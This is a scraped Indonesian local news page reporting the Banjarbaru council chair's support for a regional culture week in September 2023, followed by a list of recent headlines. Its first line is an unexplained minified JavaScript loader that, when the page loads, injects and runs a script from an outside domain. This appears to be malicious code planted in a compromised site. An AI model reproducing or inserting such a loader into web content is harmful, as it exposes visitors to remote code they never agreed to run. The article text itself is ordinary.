(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

Ketua DPRD Banjarbaru Dukung Pelestarian Seni Budaya Daerah


KANALKALIMANTAN.COM, BANJARBARU – Pelestarian seni dan budaya daerah yang dilakukan pemerintah kota melalui Pekan Kebudayaan Daerah (PKD) di Banjarbaru.

“Kami mendukung Pemko dalam pelestarian budaya melalui Pekan Kebudayaan Daerah karena menampilkan berbagai seni dan budaya daerah yang tumbuh dan berkembang di Banjarbaru,” ujar Ketua DPRD Banjarbaru Fadliansyah, Sabtu (9/9/2023)

Menurut Fadliansyah, masyarakat Banjarbaru dikenal heterogen yang dihuni beragam suku, agama dan budaya yang tumbuh dan berkembang seiring perkembangan serta kemajuan zaman.

Meski pun heterogen tetapi masyarakat hidup rukun dan damai tanpa konflik maupun gejolak meski banyak komunitas dan paguyuban yang sudah lama tumbuh dan berkembang di ibu kota Kalsel.

“Oleh karena itu, kami nilai Pekan Kebudayaan Daerah yang difasilitasi Pemko Banjarbaru sangat tepat dalam melestarikan dan menyatukan seni dan budaya daerah yang tumbuh berkembang di Banjarbaru,” ungkapnya.

Dikatakan Fadliansyah, PKD juga memberikan hiburan bagi seluruh masyarakat dan membawa dampak positif bagi pariwisata Banjarbaru karena banyak orang yang datang berkunjung.

“Selama kegiatan, tentunya banyak masyarakat yang melihat sehingga terhibur disamping orang luar daerah yang datang dan berkunjung untuk menyaksikan beragam seni maupun budaya daerah,” ucapnya.

Pemko Banjarbaru menggelar PKD yang diselenggarakan selama 9 hari sejak 9-17 September 2023 di lapangan Dr Murdjani menampilkan beragam seni maupun budaya.

Pekan Kebudayaan Daerah merupakan upaya yang dilakukan Pemko Banjarbaru untuk melestarikan seni dan budaya yang berkembang di masyarakat.

Kesenian dan budaya daerah ditampilkan melalui 23 stan yang disediakan gratis dan diisi komunitas maupun paguyuban menampilkan budaya masing-masing. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Muhammad Andi

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

20 menit ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

42 menit ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

1 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

4 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

6 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

16 jam ago

This website uses cookies.